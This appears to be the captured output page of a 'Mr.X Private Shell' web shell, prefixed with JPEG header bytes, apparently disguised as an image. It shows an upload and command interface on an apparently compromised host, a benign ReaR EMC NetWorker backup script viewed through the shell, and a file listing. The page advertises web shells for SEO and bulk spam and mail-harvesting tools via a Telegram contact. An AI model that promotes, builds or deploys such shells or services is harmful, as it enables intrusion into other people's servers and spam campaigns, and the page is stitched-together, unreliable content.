����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
# 400_verify_nsr.sh
# read NSR server name from /nsr/res/servers file of /var/lib/rear/recovery/nsr_server

if [[ ! -z "$NSRSERVER" ]]; then
    Log "NSRSERVER ($NSRSERVER) was defined in $CONFIG_DIR/local.conf"
elif [[ -f $VAR_DIR/recovery/nsr_server ]]; then
    NSRSERVER=$( cat $VAR_DIR/recovery/nsr_server )
else
    Error "Could not retrieve the EMC NetWorker Server name. Define NSRSERVER in $CONFIG_DIR/local.conf file"
fi

# check that nsr server is actually available (ping)
test "${NSRSERVER}" || Error "Define NSRSERVER (hostname or IP address) in $CONFIG_DIR/local.conf file"

if test "$PING" ; then
        if ping -c 1 "${NSRSERVER}" >/dev/null 2>&1 ; then
           Log "EMC NetWorker Server ${NSRSERVER} seems to be up and running."
        else
           Error "Sorry, but cannot reach EMC NetWorker Server ${NSRSERVER}"
        fi
else
        Log "Skipping ping test"
fi

Log "EMC NetWorker server NSRSERVER=$NSRSERVER"

Filemanager

Name Type Size Permission Actions
390_request_point_in_time_restore_parameters.sh File 2.85 KB 0644
400_verify_nsr.sh File 942 B 0644
410_verify_nsr_paths.sh File 360 B 0644